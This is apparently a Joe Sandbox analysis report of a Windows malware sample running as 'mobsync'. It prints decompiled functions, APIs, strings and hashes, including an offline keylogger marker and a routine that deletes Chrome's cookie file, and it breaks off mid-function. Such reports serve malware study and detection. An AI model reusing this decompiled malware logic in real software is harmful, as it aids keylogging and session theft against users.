], xrefs: 00409652
[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040964D
Offline Keylogger Started, xrefs: 0040963D

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: EventLocalTimechar_traitswsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
API String ID: 3003339404-248792730
Opcode ID: 375e7341d385bb75ab6c2b9bf5fec3c66d5a8c1d5dcd955edc07c68545aafce4
Instruction ID: 6949cdf2dc2b1dc4c02aecbde94e80b0bd9bd0d89d133fd011f78c3c8f91f7cb
Opcode Fuzzy Hash: 375e7341d385bb75ab6c2b9bf5fec3c66d5a8c1d5dcd955edc07c68545aafce4
Instruction Fuzzy Hash: E921B376400118AAC728EB66DC558FF77B8AF08345F00013FF842621E2EF79AA45C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00416871, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71
sleeplibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00416871(void* __edx) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t40;
				intOrPtr* _t44;

				_t40 = __edx;
				_t44 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
				 *_t44( &_v52,  &_v28,  &_v20);
				Sleep(0x3e8);
				 *_t44( &_v44,  &_v36,  &_v12);
				_t25 = E00416926( &_v12);
				_t26 = E00416926( &_v20);
				asm("sbb ebx, edx");
				_t27 = E00416926( &_v28);
				asm("sbb ebx, edx");
				_v8 = _t25 - _t26 - _t27 + E00416926( &_v36);
				asm("adc ebx, edx");
				_t29 = E00416926( &_v44);
				asm("sbb esi, edx");
				_t30 = E00416926( &_v52);
				asm("adc esi, edx");
				return E004500F0(E004500B0(_t25 - _t26 - _t27 + E00416926( &_v36) - _t29 + _t30, _t40, 0x64, 0), _t40, _v8, _t40);
			}

0x00416871
0x00416891
0x0041689f
0x004168a6
0x004168b8
0x004168bd
0x004168c9
0x004168d3
0x004168d5
0x004168df
0x004168eb
0x004168ee
0x004168f0
0x004168fe
0x00416900
0x0041690b
0x00416925

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0046BACC,?,?,?,?,?,?,?,?,?,?,?,00412F5F), ref: 00416884
GetProcAddress.KERNEL32(00000000,?,0046BACC,?,?,?,?,?,?,?,?,?,?,?,00412F5F,00000095), ref: 0041688B
Sleep.KERNEL32(000003E8,?,0046BACC,?,?,?,?,?,?,?,?,?,?,?,00412F5F,00000095), ref: 004168A6
__aulldiv.LIBCMT ref: 0041691A

Strings

GetSystemTimes, xrefs: 0041687A
kernel32.dll, xrefs: 0041687F

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcSleep__aulldiv
String ID: GetSystemTimes$kernel32.dll
API String ID: 482274533-1354958348
Opcode ID: 1b921abda40acb19141c6387d37c781a4e71f6e9ac7c30b6115b0dd65c73a19d
Instruction ID: 591b4d1d7c4e76c74ddada12000fb562f1f068179a7c55beccbbde0fa6e2f12d
Opcode Fuzzy Hash: 1b921abda40acb19141c6387d37c781a4e71f6e9ac7c30b6115b0dd65c73a19d
Instruction Fuzzy Hash: BF11A5B7D003286BC710EBF5DD85DEF7B7CAB44750F05062AF905A3545ED349A0486E4

Uniqueness

Uniqueness Score: -1.00%

Function 004349C5, Relevance: 10.6, APIs: 7, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E004349C5(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x46a090 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E004314E8(__eflags,  *0x46a090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00431522(__eflags,  *0x46a090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = L0043DFD9(_t16, 1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00431522(__eflags,  *0x46a090, 0);
								} else {
									__eflags = E00431522(__eflags,  *0x46a090, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L0043EE85(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

0x004349cc
0x004349df
0x004349e6
0x004349e9
0x004349ec
0x00434a05
0x00434a05
0x004349ee
0x004349ee
0x004349f0
0x004349fa
0x00434a00
0x00434a01
0x00434a03
0x00434a13
0x00434a17
0x00434a19
0x00434a2d
0x00434a2d
0x00434a36
0x00434a1b
0x00434a29
0x00434a2b
0x00434a3f
0x00434a41
0x00434a41
0x00000000
0x00000000
0x00000000
0x00434a2b
0x00434a44
0x00000000
0x00000000
0x00000000
0x00434a03
0x004349f0
0x00434a4c
0x00434a56
0x004349ce
0x004349d0
0x004349d0

APIs

GetLastError.KERNEL32(?,?,004349BC,00431B02), ref: 004349D3
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004349E1
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004349FA
SetLastError.KERNEL32(00000000,?,004349BC,00431B02), ref: 00434A4C

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 1db99bcae78c58c5525224386743f8d085ec1c2c788c01b57ff3d4df492baf61
Instruction ID: 0a03f5c56435e7b7bf565aa8bafc0807e20b5707f116f6618a4dc7084de369cb
Opcode Fuzzy Hash: 1db99bcae78c58c5525224386743f8d085ec1c2c788c01b57ff3d4df492baf61
Instruction Fuzzy Hash: 0401683320D7112E96117FB57C8569B2A44DB8D379F30223FF111512F1FE585C11564E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A320, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040A320(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t31;
				void* _t32;

				_t35 = __eflags;
				_t31 = __edi;
				_t30 = E00402064(_t20,  &_v52, E0043919A(_t20, __eflags, "UserProfile"));
				E0040530D(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
				L00401FA7();
				if(DeleteFileA(L00401F75( &_v28)) != 0) {
					_t28 = _t32 - 0x18;
					_push("\n[Chrome Cookies found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t32 - 0x18;
						_push("\n[Chrome Cookies not found]");
						L6:
						E00402064(_t20, _t28);
						E0040AA8C(_t20, _t30, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				L00401FA7();
				return _t21;
			}

0x0040a320
0x0040a320
0x0040a340
0x0040a345
0x0040a34e
0x0040a364
0x0040a38a
0x0040a38c
0x00000000
0x0040a366
0x0040a36d
0x0040a370
0x0040a37e
0x0040a380
0x0040a391
0x0040a391
0x0040a396
0x0040a39b
0x0040a377
0x0040a377
0x0040a377
0x0040a370
0x0040a3a3
0x0040a3ae

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040A35C
GetLastError.KERNEL32 ref: 0040A366

Strings

[Chrome Cookies not found], xrefs: 0040A380
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A327
UserProfile, xrefs: 0040A32C
[Chrome Cookies found, cleared!], xrefs: 0040A38C

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: 83eeeb57487aa974bea4dde852d66624ab4706bead233a3081c2effbbc41bcca
Instruction ID: 71bab83c232eb3aa80a51950a53fe90676adfd60c2a68e252f2a60659ee967f7
Opcode Fuzzy Hash: 83eeeb57487aa974bea4dde852d66624ab4706bead233a3081c2effbbc41bcca
Instruction Fuzzy Hash: 38016761A4030556CB09BAB5DD1BCAE7724A912705B50017FFC02731D2FD7D591D85DF

Uniqueness

Uniqueness Score: -1.00%

Function 004050E5, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004050E5(void* __ecx, void* __edi, char _a4) {
				void* _t17;
				void* _t22;
				void* _t23;

				_t22 = __ecx;
				if( *((char*)(__ecx + 0x50)) == 0) {
					return 0;
				}
				if(_a4 == 0) {
					_t24 = _t23 - 0x18;
					E00402064(_t17, _t23 - 0x18, "Connection KeepAlive disabled");
					E00402064(_t17, _t24 - 0x18, "[WARNING]");
					E004165D8(_t17, __edi);
				}
				 *(_t22 + 0x58) = CreateEventA(0, 0, 0, 0);
				SetEvent( *(_t22 + 0x54));
				WaitForSingleObject( *(_t22 + 0x58), 0xffffffff);
				CloseHandle( *(_t22 + 0x58));
				return 1;
			}

0x004050e9
0x004050ef
0x00000000
0x0040514d
0x004050f5
0x004050f7
0x00405101
0x00405110
0x00405115
0x0040511a
0x0040512c
0x0040512f
0x0040513a
0x00405143
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C2E8,?,00404C73,00000001,0046C2E8,00404C20,00000000,00000000,00000000), ref: 00405123
SetEvent.KERNEL32(?,?,00404C73,00000001,0046C2E8,00404C20,00000000,00000000,00000000), ref: 0040512F
WaitForSingleObject.KERNEL32(?,000000FF,?,00404C73,00000001,0046C2E8,00404C20,00000000,00000000,00000000), ref: 0040513A
CloseHandle.KERNEL32(?,?,00404C73,00000001,0046C2E8,00404C20,00000000,00000000,00000000), ref: 00405143

Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2

Strings

[WARNING], xrefs: 0040510B
Connection KeepAlive disabled, xrefs: 004050FC

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: Connection KeepAlive disabled$[WARNING]
API String ID: 2993684571-804309475
Opcode ID: 2f2f1b909ccbf56f372c7bc5b612678fcdc5d88654491ab39fa676556faf20bc
Instruction ID: 4a3f3a8db73678ad982533098c460406716fc9acf26f117caeb6870947dcbcc6
Opcode Fuzzy Hash: 2f2f1b909ccbf56f372c7bc5b612678fcdc5d88654491ab39fa676556faf20bc
Instruction Fuzzy Hash: 4CF0C8718007507BDB113F759D0EA677F98DB01356F00057AF901926F2D9B585548B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0043B80E, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0043B7BF,?,?,0043B75F,?,00468178,0000000C,0043B8B6,?,00000002), ref: 0043B82E
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000002,?,?,?,0043B7BF,?,?,0043B75F,?,00468178,0000000C,0043B8B6,?,00000002), ref: 0043B841
FreeLibrary.KERNEL32(00000000,?,?,?,0043B7BF,?,?,0043B75F,?,00468178,0000000C,0043B8B6,?,00000002,00000000), ref: 0043B864

Strings

mscoree.dll, xrefs: 0043B827
@, xrefs: 0043B852
CorExitProcess, xrefs: 0043B839

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll$@
API String ID: 4061214504-2482086136
Opcode ID: 6526ced06a94fd25e04ba9610b20bb07d14150e0d13d4829313775084854035e
Instruction ID: 4e1649a62f6ee3b09e01f81ad3869626034710fcbdaf9da01478699b77b668ad
Opcode Fuzzy Hash: 6526ced06a94fd25e04ba9610b20bb07d14150e0d13d4829313775084854035e
Instruction Fuzzy Hash: A1F04430600618BBCB155F65EC09B9EBFB8EB04757F5040BAF905A2261DB799E44CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004160D6, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30
sleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004160D6(WCHAR* __ecx) {
				void* __edi;
				void* _t7;
				void* _t11;
				WCHAR* _t13;
				void* _t15;

				_t16 = _t15 - 0x18;
				_t13 = __ecx;
				E00402064(_t7, _t15 - 0x18, "Alarm has been triggered!");
				E00402064(_t7, _t16 - 0x18, "[ALARM]");
				E004165D8(_t7, _t11);
				PlaySoundW(_t13, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}

0x004160d8
0x004160db
0x004160e4
0x004160f3
0x004160f8
0x00416116
0x0041611d
0x0041612a

APIs

Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00416108
PlaySoundW.WINMM(00000000,00000000), ref: 00416116
Sleep.KERNEL32(00002710), ref: 0041611D
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00416126

Strings

[ALARM], xrefs: 004160EE
Alarm has been triggered!, xrefs: 004160DF

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm has been triggered!$[ALARM]
API String ID: 614609389-1190268461
Opcode ID: 8f587516b4cfab9523d87036f115838d5d7b5ac730832c494713ee76c59e9900
Instruction ID: 2d10eecb587f4eb50cd82e886fdd1c0de5a54b8a21b058e5acdb0cdc04fd1f38
Opcode Fuzzy Hash: 8f587516b4cfab9523d87036f115838d5d7b5ac730832c494713ee76c59e9900
Instruction Fuzzy Hash: FFE09262A00320379524377B7D0FD2F2D28CAC2BA2B01006FFA08661D29D944900C6FB

Uniqueness

Uniqueness Score: -1.00%

Function 004350A9, Relevance: 9.3, APIs: 6, Instructions: 284
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E004350A9(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
				intOrPtr _v0;
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __esi;
				void* __ebp;
				signed int _t61;
				void* _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t73;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t81;
				void* _t82;
				signed int _t84;
				void* _t85;
				signed int _t87;
				signed int _t93;
				signed int _t102;
				void* _t104;
				signed int _t107;
				signed int* _t110;
				signed int* _t111;
				intOrPtr* _t113;
				signed int _t118;
				signed int _t120;
				signed int _t123;
				void* _t125;
				signed int _t128;
				signed int _t131;
				signed int _t139;
				signed int _t145;
				void _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				signed int _t153;
				signed int _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;

				_t139 = __edx;
				_t155 = _a4;
				if(_t155 == 0) {
					_t113 = L00439E14();
					_t159 = 0x16;
					 *_t113 = _t159;
					E0043626D();
					return _t159;
				}
				_push(__edi);
				_t123 = 9;
				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
				_t145 = _a8;
				__eflags = _t145;
				if(_t145 == 0) {
					_t111 = L00439E14();
					_t158 = 0x16;
					 *_t111 = _t158;
					E0043626D();
					_t78 = _t158;
					L12:
					return _t78;
				}
				_push(__ebx);
				__eflags =  *(_t145 + 4);
				if(__eflags <= 0) {
					if(__eflags < 0) {
						L10:
						_t110 = L00439E14();
						_t157 = 0x16;
						 *_t110 = _t157;
						_t78 = _t157;
						L11:
						goto L12;
					}
					__eflags =  *_t145;
					if( *_t145 < 0) {
						goto L10;
					}
				}
				_t64 = 7;
				__eflags =  *(_t145 + 4) - _t64;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						goto L10;
					}
					__eflags =  *_t145 - 0x93406fff;
					if(__eflags > 0) {
						goto L10;
					}
				}
				L00441D1C(0, _t145, _t155, __eflags);
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t67 = E00441551( &_v12);
				_pop(_t125);
				__eflags = _t67;
				if(_t67 == 0) {
					_t75 = E0044157D( &_v16);
					_pop(_t125);
					__eflags = _t75;
					if(_t75 == 0) {
						_t77 = E004415A9( &_v8);
						_pop(_t125);
						__eflags = _t77;
						if(_t77 == 0) {
							_t118 =  *(_t145 + 4);
							_t128 =  *_t145;
							__eflags = _t118;
							if(__eflags < 0) {
								L28:
								_push(_t145);
								_push(_t155);
								_t78 = E0043B307();
								__eflags = _t78;
								if(_t78 != 0) {
									goto L11;
								}
								__eflags = _v12;
								asm("cdq");
								_t147 =  *_t155;
								_t120 = _t139;
								if(__eflags == 0) {
									L32:
									_t80 = _v8;
									L33:
									asm("cdq");
									_t148 = _t147 - _t80;
									asm("sbb ebx, edx");
									_t81 = E004504E0(_t148, _t120, 0x3c, 0);
									 *_t155 = _t81;
									__eflags = _t81;
									if(_t81 < 0) {
										_t148 = _t148 + 0xffffffc4;
										 *_t155 = _t81 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t82 = E00450430(_t148, _t120, 0x3c, 0);
									_t121 = _t139;
									_t28 = _t155 + 4; // 0x848d0045
									asm("cdq");
									_t150 = _t82 +  *_t28;
									asm("adc ebx, edx");
									_t84 = E004504E0(_t150, _t139, 0x3c, 0);
									 *(_t155 + 4) = _t84;
									__eflags = _t84;
									if(_t84 < 0) {
										_t150 = _t150 + 0xffffffc4;
										 *(_t155 + 4) = _t84 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t85 = E00450430(_t150, _t121, 0x3c, 0);
									_t122 = _t139;
									_t31 = _t155 + 8; // 0xa824
									asm("cdq");
									_t152 = _t85 +  *_t31;
									asm("adc ebx, edx");
									_t87 = E004504E0(_t152, _t139, 0x18, 0);
									 *(_t155 + 8) = _t87;
									__eflags = _t87;
									if(_t87 < 0) {
										_t152 = _t152 + 0xffffffe8;
										 *(_t155 + 8) = _t87 + 0x18;
										asm("adc ebx, 0xffffffff");
									}
									_t131 = E00450430(_t152, _t122, 0x18, 0);
									__eflags = _t139;
									if(__eflags < 0) {
										L48:
										_t44 = _t155 + 0x18; // 0xa024848d
										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
										asm("cdq");
										_t153 = 7;
										_t51 = _t155 + 0xc; // 0x50506a00
										_t93 =  *_t51;
										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
										__eflags = _t93;
										if(_t93 > 0) {
											goto L43;
										}
										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
										 *(_t155 + 0xc) = _t93 + 0x1f;
										_t55 = _t131 + 0x16d; // 0x16d
										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
										goto L44;
									} else {
										if(__eflags > 0) {
											L42:
											_t34 = _t155 + 0x18; // 0xa024848d
											asm("cdq");
											_t154 = 7;
											_t39 = _t155 + 0xc;
											 *_t39 =  *(_t155 + 0xc) + _t131;
											__eflags =  *_t39;
											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
											L43:
											_t42 = _t155 + 0x1c;
											 *_t42 =  *(_t155 + 0x1c) + _t131;
											__eflags =  *_t42;
											L44:
											_t78 = 0;
											goto L11;
										}
										__eflags = _t131;
										if(_t131 == 0) {
											__eflags = _t139;
											if(__eflags > 0) {
												goto L44;
											}
											if(__eflags < 0) {
												goto L48;
											}
											__eflags = _t131;
											if(_t131 >= 0) {
												goto L44;
											}
											goto L48;
										}
										goto L42;
									}
								}
								_push(_t155);
								_t102 = L00441D6D(_t120, _t147, _t155, __eflags);
								__eflags = _t102;
								if(_t102 == 0) {
									goto L32;
								}
								_t80 = _v8 + _v16;
								 *((intOrPtr*)(_t155 + 0x20)) = 1;
								goto L33;
							}
							if(__eflags > 0) {
								L20:
								_t104 = 7;
								__eflags = _t118 - _t104;
								if(__eflags > 0) {
									goto L28;
								}
								if(__eflags < 0) {
									L23:
									asm("cdq");
									_push( &_v24);
									asm("sbb ebx, edx");
									_v24 = _t128 - _v8;
									_push(_t155);
									_v20 = _t118;
									_t78 = E0043B307();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									__eflags = _v12 - _t78;
									if(__eflags == 0) {
										goto L44;
									}
									_push(_t155);
									_t107 = L00441D6D(_t118, _t145, _t155, __eflags);
									__eflags = _t107;
									if(_t107 == 0) {
										goto L44;
									}
									asm("cdq");
									_v24 = _v24 - _v16;
									_push( &_v24);
									asm("sbb [ebp-0x10], edx");
									_push(_t155);
									_t78 = E0043B307();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									 *((intOrPtr*)(_t155 + 0x20)) = 1;
									goto L44;
								}
								__eflags = _t128 - 0x933c7b7f;
								if(_t128 >= 0x933c7b7f) {
									goto L28;
								}
								goto L23;
							}
							__eflags = _t128 - 0x3f480;
							if(_t128 <= 0x3f480) {
								goto L28;
							}
							goto L20;
						}
					}
				}
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E0043629A();
				asm("int3");
				_push(_t155);
				_t69 = E0043B2A2(_t125);
				_t156 = _t69;
				__eflags = _t156;
				if(_t156 != 0) {
					_push(_v0);
					_t70 = E004350A9(0, _t139, _t145, _t156);
					asm("sbb eax, eax");
					_t73 =  !( ~_t70) & _t156;
					__eflags = _t73;
					return _t73;
				}
				return _t69;
			}

0x004350a9
0x004350b2
0x004350b7
0x004350b9
0x004350c0
0x004350c1
0x004350c3
0x00000000
0x004350c8
0x004350cc
0x004350d4
0x004350d5
0x004350d7
0x004350da
0x004350dc
0x004350de
0x004350e5
0x004350e6
0x004350e8
0x004350ed
0x0043511e
0x00000000
0x0043511e
0x004350f1
0x004350f4
0x004350f7
0x004350f9
0x00435111
0x00435111
0x00435118
0x00435119
0x0043511b
0x0043511d
0x00000000
0x0043511d
0x004350fb
0x004350fd
0x00000000
0x00000000
0x004350fd
0x00435101
0x00435102
0x00435105
0x00435107
0x00000000
0x00000000
0x00435109
0x0043510f
0x00000000
0x00000000
0x0043510f
0x00435124
0x0043512c
0x00435130
0x00435133
0x00435136
0x0043513b
0x0043513c
0x0043513e
0x00435148
0x0043514d
0x0043514e
0x00435150
0x0043515a
0x0043515f
0x00435160
0x00435162
0x00435168
0x0043516b
0x0043516d
0x0043516f
0x004351f0
0x004351f0
0x004351f1
0x004351f2
0x004351f9
0x004351fb
0x00000000
0x00000000
0x00435201
0x00435207
0x00435208
0x0043520a
0x0043520c
0x00435228
0x00435228
0x0043522b
0x0043522b
0x0043522c
0x00435232
0x00435236
0x0043523b
0x0043523d
0x0043523f
0x00435244
0x00435247
0x00435249
0x00435249
0x00435252
0x00435259
0x0043525b
0x0043525e
0x0043525f
0x00435265
0x00435269
0x0043526e
0x00435271
0x00435273
0x00435278
0x0043527b
0x0043527e
0x0043527e
0x00435287
0x0043528e
0x00435290
0x00435293
0x00435294
0x0043529a
0x0043529e
0x004352a3
0x004352a6
0x004352a8
0x004352ad
0x004352b0
0x004352b3
0x004352b3
0x004352c1
0x004352c3
0x004352c5
0x004352f2
0x004352f2
0x004352f8
0x004352ff
0x00435300
0x00435303
0x00435303
0x00435306
0x00435309
0x0043530b
0x00000000
0x00000000
0x00435310
0x00435317
0x0043531a
0x00435320
0x00435323
0x00000000
0x004352c7
0x004352c7
0x004352cd
0x004352cd
0x004352d4
0x004352d5
0x004352d8
0x004352d8
0x004352d8
0x004352db
0x004352de
0x004352de
0x004352de
0x004352de
0x004352e1
0x004352e1
0x00000000
0x004352e1
0x004352c9
0x004352cb
0x004352e8
0x004352ea
0x00000000
0x00000000
0x004352ec
0x00000000
0x00000000
0x004352ee
0x004352f0
0x00000000
0x00000000
0x00000000
0x004352f0
0x00000000
0x004352cb
0x004352c5
0x0043520e
0x0043520f
0x00435215
0x00435217
0x00000000
0x00000000
0x0043521c
0x0043521f
0x00000000
0x0043521f
0x00435171
0x0043517b
0x0043517d
0x0043517e
0x00435180
0x00000000
0x00000000
0x00435182
0x0043518c
0x0043518f
0x00435195
0x00435196
0x00435198
0x0043519b
0x0043519c
0x0043519f
0x004351a6
0x004351a8
0x00000000
0x00000000
0x004351ae
0x004351b1
0x00000000
0x00000000
0x004351b7
0x004351b8
0x004351be
0x004351c0
0x00000000
0x00000000
0x004351c9
0x004351ca
0x004351d0
0x004351d1
0x004351d4
0x004351d5
0x004351dc
0x004351de
0x00000000
0x00000000
0x004351e4
0x00000000
0x004351e4
0x00435184
0x0043518a
0x00000000
0x00000000
0x00000000
0x0043518a
0x00435173
0x00435179
0x00000000
0x00000000
0x00000000
0x00435179
0x00435162
0x00435150
0x00435328
0x00435329
0x0043532a
0x0043532b
0x0043532c
0x0043532d
0x00435332
0x00435338
0x00435339
0x0043533e
0x00435340
0x00435342
0x00435344
0x00435348
0x00435350
0x00435355
0x00435355
0x00000000
0x00435355
0x00435359

APIs

__allrem.LIBCMT ref: 00435236
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435252
__allrem.LIBCMT ref: 00435269
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435287
__allrem.LIBCMT ref: 0043529E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004352BC

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: ddd8ce45931a40e5443d8a9b3d2240e4d1af6a873fc9811b2285e9f9c346daaf
Instruction ID: 0f9574e79e851dcb61412f9348aa4e336ac1525895054df9afc56f3bdc95fefa
Opcode Fuzzy Hash: ddd8ce45931a40e5443d8a9b3d2240e4d1af6a873fc9811b2285e9f9c346daaf
Instruction Fuzzy Hash: B6813E72A00F059BEB20AE69CC42B6B73E8DF49768F14552FF511D7382E778D9408B98

Uniqueness

Uniqueness Score: -1.00%

Function 00440972, Relevance: 9.0, APIs: 6, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E00440972(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x46a1e0; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = L0043DFD9(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = L00440F8E(_t25, _t36, __eflags,  *0x46a1e0, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E004407E4(_t25, _t31, 0x46b654);
							L0043EE85(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
